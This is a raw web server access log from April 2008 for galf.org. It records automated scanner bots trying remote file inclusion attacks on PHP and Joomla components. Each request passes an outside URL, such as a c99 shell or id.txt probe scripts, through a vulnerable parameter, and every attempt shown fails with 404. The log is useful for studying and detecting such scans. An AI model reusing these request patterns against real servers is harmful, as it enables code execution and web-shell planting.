67.19.61.90 - - [27/Apr/2008:17:00:33 -0700] "GET /logs/access_080121.log/home.php?pagina=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.19.61.90 - - [27/Apr/2008:17:00:33 -0700] "GET /home.php?pagina=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.19.61.90 - - [27/Apr/2008:17:00:33 -0700] "GET /logs/home.php?pagina=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.55.174.10 - - [27/Apr/2008:17:00:35 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.55.174.10 - - [27/Apr/2008:17:00:35 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.55.174.10 - - [27/Apr/2008:17:00:35 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.55.174.10 - - [27/Apr/2008:17:00:35 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.55.174.10 - - [27/Apr/2008:17:00:35 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.55.174.10 - - [27/Apr/2008:17:00:35 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
64.57.64.147 - - [27/Apr/2008:17:01:00 -0700] "GET /oneadmin/config.php?path[docroot]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.243.128.10 - - [27/Apr/2008:17:01:04 -0700] "GET /logs/access_080113.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.243.128.10 - - [27/Apr/2008:17:01:05 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.243.128.10 - - [27/Apr/2008:17:01:05 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.243.128.10 - - [27/Apr/2008:17:01:06 -0700] "GET /logs/access_071231.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.61.90 - - [27/Apr/2008:17:01:40 -0700] "GET /logs/access_080121.log/home.php?pagina=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.19.61.90 - - [27/Apr/2008:17:01:40 -0700] "GET /home.php?pagina=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.19.61.90 - - [27/Apr/2008:17:01:40 -0700] "GET /logs/home.php?pagina=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.15.153.63 - - [27/Apr/2008:17:02:14 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [27/Apr/2008:17:02:14 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [27/Apr/2008:17:02:14 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
77.232.68.17 - - [27/Apr/2008:17:02:21 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.17 - - [27/Apr/2008:17:02:21 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.17 - - [27/Apr/2008:17:02:21 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.32.245 - - [27/Apr/2008:17:02:30 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.94.32.245 - - [27/Apr/2008:17:02:30 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.94.32.245 - - [27/Apr/2008:17:02:30 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [27/Apr/2008:17:02:38 -0700] "GET /logs/access_071224.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.108.67.176 - - [27/Apr/2008:17:02:53 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.176 - - [27/Apr/2008:17:02:54 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.176 - - [27/Apr/2008:17:02:54 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.17 - - [27/Apr/2008:17:02:54 -0700] "GET /logs/access_071224.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.32.245 - - [27/Apr/2008:17:02:55 -0700] "GET /logs/access_071224.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
196.22.134.230 - - [27/Apr/2008:17:02:58 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
196.22.134.230 - - [27/Apr/2008:17:02:59 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
196.22.134.230 - - [27/Apr/2008:17:03:00 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
89.108.67.176 - - [27/Apr/2008:17:03:01 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.176 - - [27/Apr/2008:17:03:01 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.176 - - [27/Apr/2008:17:03:01 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.196.64.12 - - [27/Apr/2008:17:03:15 -0700] "GET /logs/access_071008.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.196.64.12 - - [27/Apr/2008:17:03:15 -0700] "GET /logs/access_071008.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.36.177.149 - - [27/Apr/2008:17:03:26 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
65.36.177.149 - - [27/Apr/2008:17:03:26 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
65.36.177.149 - - [27/Apr/2008:17:03:26 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
89.108.67.176 - - [27/Apr/2008:17:03:30 -0700] "GET /logs/access_071224.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.176 - - [27/Apr/2008:17:03:34 -0700] "GET /logs/access_071224.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
196.22.134.230 - - [27/Apr/2008:17:03:43 -0700] "GET /logs/access_071224.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.15.153.63 - - [27/Apr/2008:17:04:35 -0700] "GET /logs/index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.160.251.134 - - [27/Apr/2008:17:04:35 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.153.63 - - [27/Apr/2008:17:04:35 -0700] "GET /index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.160.251.134 - - [27/Apr/2008:17:04:40 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.160.251.134 - - [27/Apr/2008:17:04:46 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.32.245 - - [27/Apr/2008:17:05:18 -0700] "GET /logs/index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.94.32.245 - - [27/Apr/2008:17:05:18 -0700] "GET /index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.42.188.202 - - [27/Apr/2008:17:06:27 -0700] "GET //vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
200.125.192.60 - - [27/Apr/2008:17:06:47 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.125.192.60 - - [27/Apr/2008:17:06:48 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.125.192.60 - - [27/Apr/2008:17:06:48 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.179.90.54 - - [27/Apr/2008:17:06:52 -0700] "GET /logs/access.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.179.90.54 - - [27/Apr/2008:17:06:52 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.179.90.54 - - [27/Apr/2008:17:06:52 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.125.192.60 - - [27/Apr/2008:17:07:00 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.125.192.60 - - [27/Apr/2008:17:07:01 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.125.192.60 - - [27/Apr/2008:17:07:01 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.125.192.60 - - [27/Apr/2008:17:07:09 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.125.192.60 - - [27/Apr/2008:17:07:09 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.125.192.60 - - [27/Apr/2008:17:07:10 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.160.251.134 - - [27/Apr/2008:17:07:11 -0700] "GET /logs/access_071224.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
198.106.231.114 - - [27/Apr/2008:17:07:33 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.misapri.com//includes/data/temp?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
198.106.231.114 - - [27/Apr/2008:17:07:34 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.misapri.com//includes/data/temp?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
66.7.193.54 - - [27/Apr/2008:17:07:37 -0700] "GET /logs/access_071231.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.7.193.54 - - [27/Apr/2008:17:07:37 -0700] "GET /logs/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
87.15.107.13 - - [27/Apr/2008:17:07:42 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
69.72.211.242 - - [27/Apr/2008:17:09:29 -0700] "GET /p.php?p=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:09:29 -0700] "GET /p.php?p=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
200.21.85.101 - - [27/Apr/2008:17:11:30 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.21.85.101 - - [27/Apr/2008:17:11:31 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.21.85.101 - - [27/Apr/2008:17:11:33 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:11:37 -0700] "GET /logs/access_070910.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:11:37 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:11:38 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.108.67.176 - - [27/Apr/2008:17:11:39 -0700] "GET /logs/index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.176 - - [27/Apr/2008:17:11:39 -0700] "GET /index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.100.1.157 - - [27/Apr/2008:17:11:47 -0700] "GET /logs/access.log/main.php?page=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
208.100.1.157 - - [27/Apr/2008:17:11:47 -0700] "GET /main.php?page=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
208.100.1.157 - - [27/Apr/2008:17:11:47 -0700] "GET /logs/main.php?page=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
87.229.26.205 - - [27/Apr/2008:17:12:33 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
87.229.26.205 - - [27/Apr/2008:17:12:33 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:12:57 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.215.228.13 - - [27/Apr/2008:17:13:02 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
213.215.228.13 - - [27/Apr/2008:17:13:02 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
83.223.101.14 - - [27/Apr/2008:17:13:02 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
83.223.101.14 - - [27/Apr/2008:17:13:02 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
200.21.85.101 - - [27/Apr/2008:17:13:15 -0700] "GET /logs/access_071224.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.49.98 - - [27/Apr/2008:17:14:07 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
70.86.49.98 - - [27/Apr/2008:17:14:08 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
203.116.91.54 - - [27/Apr/2008:17:14:22 -0700] "GET //vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
213.194.149.65 - - [27/Apr/2008:17:14:42 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.94.32.245 - - [27/Apr/2008:17:14:42 -0700] "GET /logs/access_070924.log/index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:14:42 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
69.94.32.245 - - [27/Apr/2008:17:14:42 -0700] "GET /index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.94.32.245 - - [27/Apr/2008:17:14:42 -0700] "GET /logs/index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.7.193.54 - - [27/Apr/2008:17:14:53 -0700] "GET /logs/access_071231.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.7.193.54 - - [27/Apr/2008:17:14:53 -0700] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.7.193.54 - - [27/Apr/2008:17:14:54 -0700] "GET /logs/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
67.15.153.63 - - [27/Apr/2008:17:14:56 -0700] "GET /logs/access_070924.log/index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [27/Apr/2008:17:14:57 -0700] "GET /index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [27/Apr/2008:17:14:57 -0700] "GET /logs/index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
59.106.129.89 - - [27/Apr/2008:17:15:28 -0700] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/y.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
59.106.129.89 - - [27/Apr/2008:17:15:29 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/y.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
59.106.129.89 - - [27/Apr/2008:17:15:29 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/y.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:15:52 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.30.73.117 - - [27/Apr/2008:17:18:09 -0700] "GET /logs/access_070917.log//vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
